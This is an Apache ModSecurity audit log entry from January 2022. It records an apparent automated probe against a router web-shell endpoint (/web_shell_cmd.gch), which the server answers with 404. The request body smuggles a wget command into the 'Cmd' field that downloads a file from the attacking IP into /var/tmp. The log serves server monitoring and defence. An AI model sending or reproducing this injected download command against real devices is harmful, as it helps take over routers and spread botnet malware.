--18d96351-A--
[29/Jan/2022:17:16:55 +0200] YfVaZwzVRmOk8j9EDGMi9QAAAAw 92.223.105.192 33588 172.104.132.106 443
--18d96351-B--
POST /web_shell_cmd.gch HTTP/1.1
Host: 172.104.132.106
User-Agent: Go-http-client/1.1
Content-Length: 152
Content-Type: text/plain

--18d96351-C--
IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+http%3A%2F%2F92.223.105.192%2Fm-i.p-s.Sakura+-O+%2Fvar%2Ftmp%2Fresp&CmdAck=
--18d96351-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1

--18d96351-E--
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

--18d96351-H--
Message:  [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "792"] [id "920350"] [msg "Host header is a numeric IP address"] [data "172.104.132.106"] [severity "WARNING"] [ver "OWASP_CRS/3.1.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] Warning. Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host.
Apache-Error: [file "ssl_engine_kernel.c"] [line 383] [level 7] AH02034: Initial (No.1) HTTPS request received for child 12 (server daemon.synaptic4u.co.za:443)
Apache-Error: [file "mod_authz_core.c"] [line 820] [level 7] AH01626: authorization result of Require all granted: granted
Apache-Error: [file "mod_authz_core.c"] [line 820] [level 7] AH01626: authorization result of <RequireAny>: granted
Apache-Error: [file "apache2_util.c"] [line 273] [level 3] [client 92.223.105.192] ModSecurity:  [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "792"] [id "920350"] [msg "Host header is a numeric IP address"] [data "172.104.132.106"] [severity "WARNING"] [ver "OWASP_CRS/3.1.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] Warning. Pattern match "^[\\\\\\\\d.:]+$" at REQUEST_HEADERS:Host. [hostname "172.104.132.106"] [uri "/web_shell_cmd.gch"] [unique_id "YfVaZwzVRmOk8j9EDGMi9QAAAAw"]
Apache-Error: [file "core.c"] [line 4752] [level 6] AH00128: File does not exist: /var/www/daemon.synaptic4u.co.za/public_html/web_shell_cmd.gch
Stopwatch: 1643469415554028 3460 (- - -)
Stopwatch2: 1643469415554028 3460; combined=2241, p1=1017, p2=770, p3=57, p4=225, p5=172, sr=158, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.3 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
Server: Apache
Engine-Mode: "ENABLED"

--18d96351-Z--
